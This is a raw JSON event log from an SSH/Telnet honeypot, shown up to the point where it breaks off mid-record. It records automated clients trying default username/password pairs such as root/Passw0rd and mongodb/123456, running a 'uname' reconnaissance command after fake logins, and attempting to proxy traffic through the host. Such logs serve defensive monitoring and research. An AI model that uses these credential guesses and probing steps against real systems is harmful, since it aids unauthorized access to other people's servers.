{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.823790Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:22.869081Z","src_ip":"185.246.128.133","session":"55d5b46fd845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59874,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9369006e565","protocol":"ssh","message":"New connection: 212.227.235.229:59874 (1.2.3.4:22) [session: c9369006e565]","sensor":"my-vps","timestamp":"2025-08-28T05:58:30.640996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:58:30.642061Z","src_ip":"212.227.235.229","session":"c9369006e565"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:58:30.819844Z","src_ip":"212.227.235.229","session":"c9369006e565"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:58:31.298776Z","src_ip":"212.227.235.229","session":"c9369006e565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59904,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0307bf4c002","protocol":"ssh","message":"New connection: 212.227.125.160:59904 (1.2.3.4:22) [session: c0307bf4c002]","sensor":"my-vps","timestamp":"2025-08-28T05:58:31.821177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:58:31.828820Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:58:31.925331Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:58:32.545560Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:32.616925Z","src_ip":"212.227.235.229","session":"c9369006e565"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:58:33.232402Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:58:33.233104Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:33.645644Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:33.646750Z","src_ip":"212.227.125.160","session":"c0307bf4c002"}
{"eventid":"cowrie.session.closed","duration":31.48567295074463,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:35.139842Z","src_ip":"212.227.235.229","session":"c176f32a2463"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49142,"dst_ip":"1.2.3.4","dst_port":22,"session":"010c329c8cd3","protocol":"ssh","message":"New connection: 212.227.235.229:49142 (1.2.3.4:22) [session: 010c329c8cd3]","sensor":"my-vps","timestamp":"2025-08-28T05:58:39.175909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:58:39.176827Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:58:39.320856Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:58:39.755987Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:58:40.066577Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:58:40.067260Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:40.217611Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:58:40.218648Z","src_ip":"212.227.235.229","session":"010c329c8cd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46042,"dst_ip":"1.2.3.4","dst_port":22,"session":"88348ab7813c","protocol":"ssh","message":"New connection: 212.227.235.229:46042 (1.2.3.4:22) [session: 88348ab7813c]","sensor":"my-vps","timestamp":"2025-08-28T05:59:00.851029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:00.854070Z","src_ip":"212.227.235.229","session":"88348ab7813c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:01.027820Z","src_ip":"212.227.235.229","session":"88348ab7813c"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:01.602452Z","src_ip":"212.227.235.229","session":"88348ab7813c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:02.749895Z","src_ip":"212.227.235.229","session":"88348ab7813c"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52602,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cbd18cf9f4d","protocol":"telnet","message":"New connection: 8.222.212.69:52602 (1.2.3.4:23) [session: 8cbd18cf9f4d]","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.004509Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48650,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f29df013127","protocol":"ssh","message":"New connection: 212.227.125.160:48650 (1.2.3.4:22) [session: 1f29df013127]","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.205770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.227568Z","src_ip":"212.227.125.160","session":"1f29df013127"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.330423Z","src_ip":"212.227.125.160","session":"1f29df013127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39730,"dst_ip":"1.2.3.4","dst_port":22,"session":"794ab63631d3","protocol":"ssh","message":"New connection: 212.227.235.229:39730 (1.2.3.4:22) [session: 794ab63631d3]","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.377527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.388472Z","src_ip":"212.227.235.229","session":"794ab63631d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.521116Z","src_ip":"212.227.235.229","session":"794ab63631d3"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:08.724408Z","src_ip":"212.227.125.160","session":"1f29df013127"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:09.093557Z","src_ip":"212.227.235.229","session":"794ab63631d3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:09.829696Z","src_ip":"212.227.125.160","session":"1f29df013127"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:10.238085Z","src_ip":"212.227.235.229","session":"794ab63631d3"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52606,"dst_ip":"1.2.3.4","dst_port":23,"session":"95247cd5fe21","protocol":"telnet","message":"New connection: 8.222.212.69:52606 (1.2.3.4:23) [session: 95247cd5fe21]","sensor":"my-vps","timestamp":"2025-08-28T05:59:11.053511Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58838,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f8ff8f6f5d5","protocol":"ssh","message":"New connection: 212.227.125.160:58838 (1.2.3.4:22) [session: 4f8ff8f6f5d5]","sensor":"my-vps","timestamp":"2025-08-28T05:59:15.944804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:15.978792Z","src_ip":"212.227.125.160","session":"4f8ff8f6f5d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:16.059647Z","src_ip":"212.227.125.160","session":"4f8ff8f6f5d5"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:16.467184Z","src_ip":"212.227.125.160","session":"4f8ff8f6f5d5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:17.572940Z","src_ip":"212.227.125.160","session":"4f8ff8f6f5d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42070,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc71f650641","protocol":"ssh","message":"New connection: 212.227.235.229:42070 (1.2.3.4:22) [session: 6bc71f650641]","sensor":"my-vps","timestamp":"2025-08-28T05:59:23.373339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:23.373979Z","src_ip":"212.227.235.229","session":"6bc71f650641"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:23.517440Z","src_ip":"212.227.235.229","session":"6bc71f650641"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:23.949713Z","src_ip":"212.227.235.229","session":"6bc71f650641"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:25.094839Z","src_ip":"212.227.235.229","session":"6bc71f650641"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41014,"dst_ip":"1.2.3.4","dst_port":22,"session":"6047cd6fb1d0","protocol":"ssh","message":"New connection: 212.227.125.160:41014 (1.2.3.4:22) [session: 6047cd6fb1d0]","sensor":"my-vps","timestamp":"2025-08-28T05:59:33.807888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:33.808941Z","src_ip":"212.227.125.160","session":"6047cd6fb1d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client 